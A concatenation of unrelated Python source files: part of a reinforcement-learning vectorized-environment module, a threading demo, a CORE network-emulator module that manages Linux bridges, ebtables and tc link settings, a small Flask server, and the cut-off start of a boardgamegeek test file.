assert filename is not None
if not filename.endswith(Monitor.EXT):
if os.path.isdir(filename):
filename = os.path.join(filename, Monitor.EXT)
else:
filename = filename + "." + Monitor.EXT
self.f = open(filename, "wt")
if isinstance(header, dict):
header = "# {} \n".format(json.dumps(header))
self.f.write(header)
self.logger = csv.DictWriter(
self.f, fieldnames=("r", "l", "t") + tuple(extra_keys)
)
self.logger.writeheader()
self.f.flush()
def write_row(self, epinfo):
if self.logger:
self.logger.writerow(epinfo)
self.f.flush()
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
@abstractmethod
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
def render(self):
print("Render not defined for %s" % self)
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
class VecEnvWrapper(VecEnv):
def __init__(self, venv, observation_space=None, action_space=None):
self.venv = venv
VecEnv.__init__(
self,
num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space,
)
def step_async(self, actions):
self.venv.step_async(actions)
@abstractmethod
def reset(self):
pass
@abstractmethod
def step_wait(self):
pass
def close(self):
return self.venv.close()
def render(self):
self.venv.render()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
shapes, dtypes = {}, {}
self.keys = []
obs_space = env.observation_space
if isinstance(obs_space, spaces.Dict):
assert isinstance(obs_space.spaces, OrderedDict)
subspaces = obs_space.spaces
else:
subspaces = {None: obs_space}
for key, box in subspaces.items():
shapes[key] = box.shape
dtypes[key] = box.dtype
self.keys.append(key)
self.buf_obs = {
k: np.zeros((self.num_envs,) + tuple(shapes[k]), dtype=dtypes[k])
for k in self.keys
}
self.buf_dones = np.zeros((self.num_envs,), dtype=np.bool)
self.buf_rews = np.zeros((self.num_envs,), dtype=np.float32)
self.buf_infos = [{} for _ in range(self.num_envs)]
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
for e in range(self.num_envs):
obs, self.buf_rews[e], self.buf_dones[e], self.buf_infos[e] = self.envs[
e
].step(self.actions[e])
if self.buf_dones[e]:
obs = self.envs[e].reset()
self._save_obs(e, obs)
return (
self._obs_from_buf(),
np.copy(self.buf_rews),
np.copy(self.buf_dones),
self.buf_infos.copy(),
)
def reset(self):
for e in range(self.num_envs):
obs = self.envs[e].reset()
self._save_obs(e, obs)
return self._obs_from_buf()
def close(self):
return
def render(self):
return [e.render() for e in self.envs]
def _save_obs(self, e, obs):
for k in self.keys:
if k is None:
self.buf_obs[k][e] = obs
else:
self.buf_obs[k][e] = obs[k]
def _obs_from_buf(self):
if self.keys == [None]:
return self.buf_obs[None]
else:
return self.buf_obs
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == "reset":
ob = env.reset()
remote.send(ob)
elif cmd == "close":
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [
Process(
target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))
)
for (work_remote, remote, env_fn) in zip(
self.work_remotes, self.remotes, env_fns
)
]
for p in self.ps:
p.daemon = (
True
) # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(("reset", None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
self.closed = True
|
thread_test.py
|
import threading # python3主要的线程库 _thread是旧版本不推荐
import time
from threading import current_thread
def myTHread(arg1, arg2):
print(current_thread().getName(), 'start')
print('%s, %s' % (arg1, arg2))
time.sleep(3)
print(current_thread().getName(), 'stop')
# 循环开5个线程
for i in range(1, 6, 1):
t1 = threading.Thread(target=myTHread, args=(i, i+1))
t1.start()
print(t1, 'begin')
print(current_thread().getName(),'end')
|
network.py
|
"""
Defines network nodes used within core.
"""
import logging
import math
import threading
import time
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Type
import netaddr
from core import utils
from core.emulator.data import InterfaceData, LinkData, LinkOptions
from core.emulator.enumerations import (
LinkTypes,
MessageFlags,
NetworkPolicy,
NodeTypes,
RegisterTlvs,
)
from core.errors import CoreCommandError, CoreError
from core.executables import EBTABLES, TC
from core.nodes.base import CoreNetworkBase
from core.nodes.interface import CoreInterface, GreTap, Veth
from core.nodes.netclient import get_net_client
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
from core.location.mobility import WirelessModel, WayPointMobility
WirelessModelType = Type[WirelessModel]
LEARNING_DISABLED: int = 0
ebtables_lock: threading.Lock = threading.Lock()
class EbtablesQueue:
"""
Helper class for queuing up ebtables commands into rate-limited
atomic commits. This improves performance and reliability when there are
many WLAN link updates.
"""
# update rate is every 300ms
rate: float = 0.3
# ebtables
atomic_file: str = "/tmp/pycore.ebtables.atomic"
def __init__(self) -> None:
"""
Initialize the helper class, but don't start the update thread
until a WLAN is instantiated.
"""
self.doupdateloop: bool = False
self.updatethread: Optional[threading.Thread] = None
# this lock protects cmds and updates lists
self.updatelock: threading.Lock = threading.Lock()
# list of pending ebtables commands
self.cmds: List[str] = []
# list of WLANs requiring update
self.updates: List["CoreNetwork"] = []
# timestamps of last WLAN update; this keeps track of WLANs that are
# using this queue
self.last_update_time: Dict["CoreNetwork", float] = {}
def startupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kick off the update loop; only needs to be invoked once.
:return: nothing
"""
with self.updatelock:
self.last_update_time[wlan] = time.monotonic()
if self.doupdateloop:
return
self.doupdateloop = True
self.updatethread = threading.Thread(target=self.updateloop, daemon=True)
self.updatethread.start()
def stopupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kill the update loop thread if there are no more WLANs using it.
:return: nothing
"""
with self.updatelock:
try:
del self.last_update_time[wlan]
except KeyError:
logging.exception(
"error deleting last update time for wlan, ignored before: %s", wlan
)
if len(self.last_update_time) > 0:
return
self.doupdateloop = False
if self.updatethread:
self.updatethread.join()
self.updatethread = None
def ebatomiccmd(self, cmd: str) -> str:
"""
Helper for building ebtables atomic file command list.
:param cmd: ebtable command
:return: ebtable atomic command
"""
return f"{EBTABLES} --atomic-file {self.atomic_file} {cmd}"
def lastupdate(self, wlan: "CoreNetwork") -> float:
"""
Return the time elapsed since this WLAN was last updated.
:param wlan: wlan entity
:return: elpased time
"""
try:
elapsed = time.monotonic() - self.last_update_time[wlan]
except KeyError:
self.last_update_time[wlan] = time.monotonic()
elapsed = 0.0
return elapsed
def updated(self, wlan: "CoreNetwork") -> None:
"""
Keep track of when this WLAN was last updated.
:param wlan: wlan entity
:return: nothing
"""
self.last_update_time[wlan] = time.monotonic()
self.updates.remove(wlan)
def updateloop(self) -> None:
"""
Thread target that looks for WLANs needing update, and
rate limits the amount of ebtables activity. Only one userspace program
should use ebtables at any given time, or results can be unpredictable.
:return: nothing
"""
while self.doupdateloop:
with self.updatelock:
for wlan in self.updates:
# Check if wlan is from a previously closed session. Because of the
# rate limiting scheme employed here, this may happen if a new session
# is started soon after closing a previous session.
# TODO: if these are WlanNodes, this will never throw an exception
try:
wlan.session
except Exception:
# Just mark as updated to remove from self.updates.
self.updated(wlan)
continue
if self.lastupdate(wlan) > self.rate:
self.buildcmds(wlan)
self.ebcommit(wlan)
self.updated(wlan)
time.sleep(self.rate)
def ebcommit(self, wlan: "CoreNetwork") -> None:
"""
Perform ebtables atomic commit using commands built in the self.cmds list.
:return: nothing
"""
# save kernel ebtables snapshot to a file
args = self.ebatomiccmd("--atomic-save")
wlan.host_cmd(args)
# modify the table file using queued ebtables commands
for c in self.cmds:
args = self.ebatomiccmd(c)
wlan.host_cmd(args)
self.cmds = []
# commit the table file to the kernel
args = self.ebatomiccmd("--atomic-commit")
wlan.host_cmd(args)
try:
wlan.host_cmd(f"rm -f {self.atomic_file}")
except CoreCommandError:
logging.exception("error removing atomic file: %s", self.atomic_file)
def ebchange(self, wlan: "CoreNetwork") -> None:
"""
Flag a change to the given WLAN's _linked dict, so the ebtables
chain will be rebuilt at the next interval.
:return: nothing
"""
with self.updatelock:
if wlan not in self.updates:
self.updates.append(wlan)
def buildcmds(self, wlan: "CoreNetwork") -> None:
"""
Inspect a _linked dict from a wlan, and rebuild the ebtables chain for that WLAN.
:return: nothing
"""
with wlan._linked_lock:
if wlan.has_ebtables_chain:
# flush the chain
self.cmds.append(f"-F {wlan.brname}")
else:
wlan.has_ebtables_chain = True
self.cmds.extend(
[
f"-N {wlan.brname} -P {wlan.policy.value}",
f"-A FORWARD --logical-in {wlan.brname} -j {wlan.brname}",
]
)
# rebuild the chain
for iface1, v in wlan._linked.items():
for oface2, linked in v.items():
if wlan.policy == NetworkPolicy.DROP and linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {iface1.localname} -o {oface2.localname} -j ACCEPT",
f"-A {wlan.brname} -o {iface1.localname} -i {oface2.localname} -j ACCEPT",
]
)
elif wlan.policy == NetworkPolicy.ACCEPT and not linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {iface1.localname} -o {oface2.localname} -j DROP",
f"-A {wlan.brname} -o {iface1.localname} -i {oface2.localname} -j DROP",
]
)
# a global object because all WLANs share the same queue
# cannot have multiple threads invoking the ebtables commnd
ebq: EbtablesQueue = EbtablesQueue()
def ebtablescmds(call: Callable[..., str], cmds: List[str]) -> None:
"""
Run ebtable commands.
:param call: function to call commands
:param cmds: commands to call
:return: nothing
"""
with ebtables_lock:
for args in cmds:
call(args)
class CoreNetwork(CoreNetworkBase):
"""
Provides linux bridge network functionality for core nodes.
"""
policy: NetworkPolicy = NetworkPolicy.DROP
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
Creates a LxBrNet instance.
:param session: core session instance
:param _id: object id
:param name: object name
:param server: remote server node
will run on, default is None for localhost
:param policy: network policy
"""
super().__init__(session, _id, name, server)
if name is None:
name = str(self.id)
if policy is not None:
self.policy = policy
self.name: Optional[str] = name
sessionid = self.session.short_session_id()
self.brname: str = f"b.{self.id}.{sessionid}"
self.has_ebtables_chain: bool = False
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: str = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command that is used to configure and setup the network on the host
system and all configured distributed servers.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
logging.debug("network node(%s) cmd", self.name)
output = utils.cmd(args, env, cwd, wait, shell)
self.session.distributed.execute(lambda x: x.remote_cmd(args, env, cwd, wait))
return output
def startup(self) -> None:
"""
Linux bridge starup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_bridge(self.brname)
self.has_ebtables_chain = False
self.up = True
ebq.startupdateloop(self)
def shutdown(self) -> None:
"""
Linux bridge shutdown logic.
:return: nothing
"""
if not self.up:
return
ebq.stopupdateloop(self)
try:
self.net_client.delete_bridge(self.brname)
if self.has_ebtables_chain:
cmds = [
f"{EBTABLES} -D FORWARD --logical-in {self.brname} -j {self.brname}",
f"{EBTABLES} -X {self.brname}",
]
ebtablescmds(self.host_cmd, cmds)
except CoreCommandError:
logging.exception("error during shutdown")
# removes veth pairs used for bridge-to-bridge connections
for iface in self.get_ifaces():
iface.shutdown()
self.ifaces.clear()
self._linked.clear()
del self.session
self.up = False
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface to attach
:return: nothing
"""
if self.up:
iface.net_client.set_iface_master(self.brname, iface.localname)
super().attach(iface)
def detach(self, iface: CoreInterface) -> None:
"""
Detach a network interface.
:param iface: network interface to detach
:return: nothing
"""
if self.up:
iface.net_client.delete_iface(self.brname, iface.localname)
super().detach(iface)
def linked(self, iface1: CoreInterface, iface2: CoreInterface) -> bool:
"""
Determine if the provided network interfaces are linked.
:param iface1: interface one
:param iface2: interface two
:return: True if interfaces are linked, False otherwise
"""
# check if the network interfaces are attached to this network
if self.ifaces[iface1.net_id] != iface1:
raise ValueError(f"inconsistency for interface {iface1.name}")
if self.ifaces[iface2.net_id] != iface2:
raise ValueError(f"inconsistency for interface {iface2.name}")
try:
linked = self._linked[iface1][iface2]
except KeyError:
if self.policy == NetworkPolicy.ACCEPT:
linked = True
elif self.policy == NetworkPolicy.DROP:
linked = False
else:
raise Exception(f"unknown policy: {self.policy.value}")
self._linked[iface1][iface2] = linked
return linked
def unlink(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Unlink two interfaces, resulting in adding or removing ebtables
filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self._linked_lock:
if not self.linked(iface1, iface2):
return
self._linked[iface1][iface2] = False
ebq.ebchange(self)
def link(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Link two interfaces together, resulting in adding or removing
ebtables filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self._linked_lock:
if self.linked(iface1, iface2):
return
self._linked[iface1][iface2] = True
ebq.ebchange(self)
def linkconfig(
self, iface: CoreInterface, options: LinkOptions, iface2: CoreInterface = None
) -> None:
"""
Configure link parameters by applying tc queuing disciplines on the interface.
:param iface: interface one
:param options: options for configuring link
:param iface2: interface two
:return: nothing
"""
# determine if any settings have changed
changed = any(
[
iface.setparam("bw", options.bandwidth),
iface.setparam("delay", options.delay),
iface.setparam("loss", options.loss),
iface.setparam("duplicate", options.dup),
iface.setparam("jitter", options.jitter),
iface.setparam("buffer", options.buffer),
]
)
if not changed:
return
# delete tc configuration or create and add it
devname = iface.localname
if all(
[
options.delay is None or options.delay <= 0,
options.jitter is None or options.jitter <= 0,
options.loss is None or options.loss <= 0,
options.dup is None or options.dup <= 0,
options.bandwidth is None or options.bandwidth <= 0,
options.buffer is None or options.buffer <= 0,
]
):
if not iface.getparam("has_netem"):
return
if self.up:
cmd = f"{TC} qdisc delete dev {devname} root handle 10:"
iface.host_cmd(cmd)
iface.setparam("has_netem", False)
else:
netem = ""
if options.bandwidth is not None:
limit = 1000
bw = options.bandwidth / 1000
if options.buffer is not None and options.buffer > 0:
limit = options.buffer
elif options.delay and options.bandwidth:
delay = options.delay / 1000
limit = max(2, math.ceil((2 * bw * delay) / (8 * iface.mtu)))
netem += f" rate {bw}kbit"
netem += f" limit {limit}"
if options.delay is not None:
netem += f" delay {options.delay}us"
if options.jitter is not None:
if options.delay is None:
netem += f" delay 0us {options.jitter}us 25%"
else:
netem += f" {options.jitter}us 25%"
if options.loss is not None and options.loss > 0:
netem += f" loss {min(options.loss, 100)}%"
if options.dup is not None and options.dup > 0:
netem += f" duplicate {min(options.dup, 100)}%"
if self.up:
cmd = f"{TC} qdisc replace dev {devname} root handle 10: netem {netem}"
iface.host_cmd(cmd)
iface.setparam("has_netem", True)
def linknet(self, net: CoreNetworkBase) -> CoreInterface:
"""
Link this bridge with another by creating a veth pair and installing
each device into each bridge.
:param net: network to link with
:return: created interface
"""
sessionid = self.session.short_session_id()
try:
_id = f"{self.id:x}"
except TypeError:
_id = str(self.id)
try:
net_id = f"{net.id:x}"
except TypeError:
net_id = str(net.id)
localname = f"veth{_id}.{net_id}.{sessionid}"
if len(localname) >= 16:
raise ValueError(f"interface local name {localname} too long")
name = f"veth{net_id}.{_id}.{sessionid}"
if len(name) >= 16:
raise ValueError(f"interface name {name} too long")
iface = Veth(self.session, None, name, localname, start=self.up)
self.attach(iface)
if net.up and net.brname:
iface.net_client.set_iface_master(net.brname, iface.name)
i = net.next_iface_id()
net.ifaces[i] = iface
with net._linked_lock:
net._linked[iface] = {}
iface.net = self
iface.othernet = net
return iface
def get_linked_iface(self, net: CoreNetworkBase) -> Optional[CoreInterface]:
"""
Return the interface of that links this net with another net
(that were linked using linknet()).
:param net: interface to get link for
:return: interface the provided network is linked to
"""
for iface in self.get_ifaces():
if iface.othernet == net:
return iface
return None
def add_ips(self, ips: List[str]) -> None:
"""
Add ip addresses on the bridge in the format "10.0.0.1/24".
:param ips: ip address to add
:return: nothing
"""
if not self.up:
return
for ip in ips:
self.net_client.create_address(self.brname, ip)
class GreTapBridge(CoreNetwork):
"""
A network consisting of a bridge with a gretap device for tunneling to
another system.
"""
def __init__(
self,
session: "Session",
remoteip: str = None,
_id: int = None,
name: str = None,
policy: NetworkPolicy = NetworkPolicy.ACCEPT,
localip: str = None,
ttl: int = 255,
key: int = None,
server: "DistributedServer" = None,
) -> None:
"""
Create a GreTapBridge instance.
:param session: core session instance
:param remoteip: remote address
:param _id: object id
:param name: object name
:param policy: network policy
:param localip: local address
:param ttl: ttl value
:param key: gre tap key
:param server: remote server node
will run on, default is None for localhost
"""
CoreNetwork.__init__(self, session, _id, name, server, policy)
if key is None:
key = self.session.id ^ self.id
self.grekey: int = key
self.localnum: Optional[int] = None
self.remotenum: Optional[int] = None
self.remoteip: Optional[str] = remoteip
self.localip: Optional[str] = localip
self.ttl: int = ttl
self.gretap: Optional[GreTap] = None
if remoteip is not None:
self.gretap = GreTap(
node=self,
session=session,
remoteip=remoteip,
localip=localip,
ttl=ttl,
key=self.grekey,
)
def startup(self) -> None:
"""
Creates a bridge and adds the gretap device to it.
:return: nothing
"""
super().startup()
if self.gretap:
self.attach(self.gretap)
def shutdown(self) -> None:
"""
Detach the gretap device and remove the bridge.
:return: nothing
"""
if self.gretap:
self.detach(self.gretap)
self.gretap.shutdown()
self.gretap = None
super().shutdown()
def add_ips(self, ips: List[str]) -> None:
"""
Set the remote tunnel endpoint. This is a one-time method for
creating the GreTap device, which requires the remoteip at startup.
The 1st address in the provided list is remoteip, 2nd optionally
specifies localip.
:param ips: address list
:return: nothing
"""
if self.gretap:
raise ValueError(f"gretap already exists for {self.name}")
remoteip = ips[0].split("/")[0]
localip = None
if len(ips) > 1:
localip = ips[1].split("/")[0]
self.gretap = GreTap(
session=self.session,
remoteip=remoteip,
localip=localip,
ttl=self.ttl,
key=self.grekey,
)
self.attach(self.gretap)
def setkey(self, key: int, iface_data: InterfaceData) -> None:
"""
Set the GRE key used for the GreTap device. This needs to be set
prior to instantiating the GreTap device (before addrconfig).
:param key: gre key
:param iface_data: interface data for setting up tunnel key
:return: nothing
"""
self.grekey = key
ips = iface_data.get_ips()
if ips:
self.add_ips(ips)
class CtrlNet(CoreNetwork):
"""
Control network functionality.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
# base control interface index
CTRLIF_IDX_BASE: int = 99
DEFAULT_PREFIX_LIST: List[str] = [
"172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
"172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
"172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
"172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
]
def __init__(
self,
session: "Session",
prefix: str,
_id: int = None,
name: str = None,
hostid: int = None,
server: "DistributedServer" = None,
assign_address: bool = True,
updown_script: str = None,
serverintf: str = None,
) -> None:
"""
Creates a CtrlNet instance.
:param session: core session instance
:param _id: node id
:param name: node namee
:param prefix: control network ipv4 prefix
:param hostid: host id
:param server: remote server node
will run on, default is None for localhost
:param assign_address: assigned address
:param updown_script: updown script
:param serverintf: server interface
:return:
"""
self.prefix: netaddr.IPNetwork = netaddr.IPNetwork(prefix).cidr
self.hostid: Optional[int] = hostid
self.assign_address: bool = assign_address
self.updown_script: Optional[str] = updown_script
self.serverintf: Optional[str] = serverintf
super().__init__(session, _id, name, server)
def add_addresses(self, index: int) -> None:
"""
Add addresses used for created control networks,
:param index: starting address index
:return: nothing
"""
use_ovs = self.session.use_ovs()
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, utils.cmd)
net_client.create_address(self.brname, current)
servers = self.session.distributed.servers
for name in servers:
server = servers[name]
index -= 1
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, server.remote_cmd)
net_client.create_address(self.brname, current)
def startup(self) -> None:
"""
Startup functionality for the control network.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
if self.net_client.existing_bridges(self.id):
raise CoreError(f"old bridges exist for node: {self.id}")
super().startup()
logging.info("added control network bridge: %s %s", self.brname, self.prefix)
if self.hostid and self.assign_address:
self.add_addresses(self.hostid)
elif self.assign_address:
self.add_addresses(-2)
if self.updown_script:
logging.info(
"interface %s updown script (%s startup) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} startup")
if self.serverintf:
self.net_client.set_iface_master(self.brname, self.serverintf)
def shutdown(self) -> None:
"""
Control network shutdown.
:return: nothing
"""
if self.serverintf is not None:
try:
self.net_client.delete_iface(self.brname, self.serverintf)
except CoreCommandError:
logging.exception(
"error deleting server interface %s from bridge %s",
self.serverintf,
self.brname,
)
if self.updown_script is not None:
try:
logging.info(
"interface %s updown script (%s shutdown) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} shutdown")
except CoreCommandError:
logging.exception("error issuing shutdown script shutdown")
super().shutdown()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Do not include CtrlNet in link messages describing this session.
:param flags: message flags
:return: list of link data
"""
return []
class PtpNet(CoreNetwork):
"""
Peer to peer network node.
"""
policy: NetworkPolicy = NetworkPolicy.ACCEPT
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface, but limit attachment to two interfaces.
:param iface: network interface
:return: nothing
"""
if len(self.ifaces) >= 2:
raise CoreError("ptp links support at most 2 network interfaces")
super().attach(iface)
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Build CORE API TLVs for a point-to-point link. One Link message
describes this network.
:param flags: message flags
:return: list of link data
"""
all_links = []
if len(self.ifaces) != 2:
return all_links
ifaces = self.get_ifaces()
iface1 = ifaces[0]
iface2 = ifaces[1]
unidirectional = 0
if iface1.getparams() != iface2.getparams():
unidirectional = 1
mac = str(iface1.mac) if iface1.mac else None
iface1_data = InterfaceData(
id=iface1.node.get_iface_id(iface1), name=iface1.name, mac=mac
)
ip4 = iface1.get_ip4()
if ip4:
iface1_data.ip4 = str(ip4.ip)
iface1_data.ip4_mask = ip4.prefixlen
ip6 = iface1.get_ip6()
if ip6:
iface1_data.ip6 = str(ip6.ip)
iface1_data.ip6_mask = ip6.prefixlen
mac = str(iface2.mac) if iface2.mac else None
iface2_data = InterfaceData(
id=iface2.node.get_iface_id(iface2), name=iface2.name, mac=mac
)
ip4 = iface2.get_ip4()
if ip4:
iface2_data.ip4 = str(ip4.ip)
iface2_data.ip4_mask = ip4.prefixlen
ip6 = iface2.get_ip6()
if ip6:
iface2_data.ip6 = str(ip6.ip)
iface2_data.ip6_mask = ip6.prefixlen
options_data = iface1.get_link_options(unidirectional)
link_data = LinkData(
message_type=flags,
type=self.linktype,
node1_id=iface1.node.id,
node2_id=iface2.node.id,
iface1=iface1_data,
iface2=iface2_data,
options=options_data,
)
all_links.append(link_data)
# build a 2nd link message for the upstream link parameters
# (swap if1 and if2)
if unidirectional:
iface1_data = InterfaceData(id=iface2.node.get_iface_id(iface2))
iface2_data = InterfaceData(id=iface1.node.get_iface_id(iface1))
options_data = iface2.get_link_options(unidirectional)
link_data = LinkData(
message_type=MessageFlags.NONE,
type=self.linktype,
node1_id=iface2.node.id,
node2_id=iface1.node.id,
iface1=iface1_data,
iface2=iface2_data,
options=options_data,
)
all_links.append(link_data)
return all_links
class SwitchNode(CoreNetwork):
"""
Provides switch functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.SWITCH
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "lanswitch"
class HubNode(CoreNetwork):
"""
Provides hub functionality within a core node, forwards packets to all bridge
ports by turning off MAC address learning.
"""
apitype: NodeTypes = NodeTypes.HUB
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "hub"
def startup(self) -> None:
"""
Startup for a hub node, that disables mac learning after normal startup.
:return: nothing
"""
super().startup()
self.net_client.set_mac_learning(self.brname, LEARNING_DISABLED)
class WlanNode(CoreNetwork):
"""
Provides wireless lan functionality within a core node.
"""
apitype: NodeTypes = NodeTypes.WIRELESS_LAN
linktype: LinkTypes = LinkTypes.WIRED
policy: NetworkPolicy = NetworkPolicy.DROP
type: str = "wlan"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
Create a WlanNode instance.
:param session: core session instance
:param _id: node id
:param name: node name
:param server: remote server node
will run on, default is None for localhost
:param policy: wlan policy
"""
super().__init__(session, _id, name, server, policy)
# wireless and mobility models (BasicRangeModel, Ns2WaypointMobility)
self.model: Optional[WirelessModel] = None
self.mobility: Optional[WayPointMobility] = None
def startup(self) -> None:
"""
Startup for a wlan node, that disables mac learning after normal startup.
:return: nothing
"""
super().startup()
ebq.ebchange(self)
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface
:return: nothing
"""
super().attach(iface)
if self.model:
iface.poshook = self.model.position_callback
iface.setposition()
def setmodel(self, model: "WirelessModelType", config: Dict[str, str]):
"""
Sets the mobility and wireless model.
:param model: wireless model to set to
:param config: configuration for model being set
:return: nothing
"""
logging.debug("node(%s) setting model: %s", self.name, model.name)
if model.config_type == RegisterTlvs.WIRELESS:
self.model = model(session=self.session, _id=self.id)
for iface in self.get_ifaces():
iface.poshook = self.model.position_callback
iface.setposition()
self.updatemodel(config)
elif model.config_type == RegisterTlvs.MOBILITY:
self.mobility = model(session=self.session, _id=self.id)
self.mobility.update_config(config)
def update_mobility(self, config: Dict[str, str]) -> None:
if not self.mobility:
raise CoreError(f"no mobility set to update for node({self.name})")
self.mobility.update_config(config)
def updatemodel(self, config: Dict[str, str]) -> None:
if not self.model:
raise CoreError(f"no model set to update for node({self.name})")
logging.debug(
"node(%s) updating model(%s): %s", self.id, self.model.name, config
)
self.model.update_config(config)
for iface in self.get_ifaces():
iface.setposition()
def links(self, flags: MessageFlags = MessageFlags.NONE) -> List[LinkData]:
"""
Retrieve all link data.
:param flags: message flags
:return: list of link data
"""
links = super().links(flags)
if self.model:
links.extend(self.model.links(flags))
return links
class TunnelNode(GreTapBridge):
"""
Provides tunnel functionality in a core node.
"""
apitype: NodeTypes = NodeTypes.TUNNEL
policy: NetworkPolicy = NetworkPolicy.ACCEPT
type: str = "tunnel"
|
server.py
|
# PackedBerry Server
from flask import Flask
from threading import Thread
import logging
import time
app = Flask('')
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route('/')
def home():
f = open('index.html', 'r')
d = f.read()
f.close()
html = str(d)
return html
def run():
try:
app.run(host='0.0.0.0',port=2021)
except Exception as e:
print(e)
def status():
t = Thread(target=run)
t.start()
def super_run():
def super():
while True:
status()
time.sleep( 60 * 60 )
super_thread = Thread(target=super)
super_thread.start()
|
test_utils.py
|
import pickle
import threading
import time
import pytest
import boardgamegeek.utils as bggutil
from _common import *
from boardgamegeek.objects.things import Thing
def test_get_xml_subelement_attr(xml):
node = bggutil.xml_subelement_attr(None, "hello")
assert node is None
node = bggutil.xml_subelement_attr(xml, None)
assert node is None
node = bggutil.xml_subelement_attr(xml, "")
assert node is None
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr")
assert node == "hello1"
node = bggutil.xml_subelement_attr(xml, "node1", attribute="int_attr", convert=int)
assert node == 1
# test that default works
node = bggutil.xml_subelement_attr(xml, "node_thats_missing", default="hello")
